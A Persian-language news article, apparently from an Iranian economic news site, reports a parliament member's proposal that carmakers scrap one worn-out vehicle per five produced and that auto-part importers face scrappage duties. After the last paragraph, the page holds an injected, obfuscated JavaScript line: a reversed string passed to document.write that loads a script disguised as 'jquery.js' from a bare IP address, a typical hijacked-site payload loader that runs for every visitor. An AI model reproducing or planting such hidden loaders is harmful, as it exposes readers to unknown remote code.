۱۴ اردیبهشت ۱۴۰۳

رهبر معظّم انقلاب: علاج برون رفت از مشکلات کشور «اقتصاد مقاومتی» است.

شناسه: ۴۴۰۸۱ ۲۰ دی ۱۳۹۶ - ۱۲:۴۷ دسته: تولید
۰

قاضی پور عضو کمیسیون صنایع و معادن مجلس با بیان اینکه این کمیسیون پیشنهاد داده است تا خودروسازان به ازای تولید ۵ دستگاه خودروی سبک و سنگین یک خودروی فرسوده را اسقاط کنند، گفت: باید واردکنندگان قطعات خودرو ملزم به اسقاط خودرو شوند.

نادر قاضی پور عضو کمیسیون صنایع و معادن مجلس در گفتگو با مسیر اقتصاد با بیان اینکه کارگروه صنعتِ کمیسیون صنایع مجلس جلساتی با مجموعه وزارت صمت در خصوص خودروهای فرسوده برگزار کرد، گفت: مجلس به دنبال تصویب قانونی در بوجه سال ۹۷ در یکی از بندهای تبصره ۷ برای تسریع روند خروج خودروهای فرسوده است.

لزوم اسقاط یک خودروی فرسوده به ازای تولید ۵ دستگاه خودرو

قاضی پور گفت: کمیسیون صنایع و معادن مجلس پیشنهاد داده است تا خودروسازان به ازای تولید ۵ دستگاه خودروی سبک و سنگین یک خودروی فرسوده را اسقاط کنند.

وی با بیان اینکه مجلس به دنبال این است تا تعداد اسقاط خودروهای فرسوده را در ازای تولید محصولات داخلی افزایش دهد، گفت: با اجرا شدن این مصوبه در سال ۹۷، مجلس به دنبال این است تا در سالیان آتی تعداد اسقاط خودروهای فرسوده در ازای تولید محصولات خودروسازان را افزایش دهد.

لزوم اسقاط ۱.۴ میلیون خودرو در سال ۱۴۰۴ 

عضو کمیسیون صنایع و معادن مجلس با اشاره به اینکه بیش از ۱.۲ میلیون خودروی فرسوده در کشور وجود دارد، گفت: آمار اسقاط در سال ۱۴۰۴ باید به بیش از ۱.۴ میلیون خودرو برسد.

قاضی پور با بیان اینکه علاوه بر آلودگی کلان شهرها، خودروهای فرسوده تاثیر بسزایی در تلفات جاده ای داشته اند، گفت: با افزایش روند اسقاط خودروهای فرسوده، بازار صنایع خودروسازی و فولاد توسعه خواهد یافت.

قطعات خودروی تولید داخل توان رقابت با محصولات مشابه را دارد

قاضی پور با انتقاد از آمار بالای واردات قطعات منفصله به کشور گفت: بایستی تمهیداتی اندیشید تا واردات قطعات خودرو به کشور را محدود کرد.

عضو کمیسیون صنایع و معادن مجلس با بیان اینکه صنعت قطعه سازی در تولید ناخالص داخلی و ایجاد ارزش افزوده بالا در هر کشوری بسیار نقش آفرین است، گفت: در حال حاضر تولیدات صنعت قطعه سازی داخلی به لحاظ کیفیت قابل رقابت با محصولات مشابه خارجی است.

وی پیشنهاد داد: در این راستا برای محدود کردن واردات قطعات خودرو به کشور بایستی واردکنندگان قطعات خودرو به کشور را ملزم به اسقاط خودرو فرسوده کرد.

وی در پایان با اشاره به اینکه قطعه ساز داخلی توانایی تامین قطعات محصولات داخلی را دارد، افزود: بایستی در یک برنامه مدون سالانه آمار واردات قطعات منفصله به کشور را کاهش داد. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))



جهت احترام به مخاطبان فرهیخته، نظرات بدون بازبینی منتشر می شود. لطفا نظرات خود را جهت تعميق و گسترش بحث ارائه نمایید. نظرات حاوی توهين، افترا و تهمت به ديگران پاک می شود.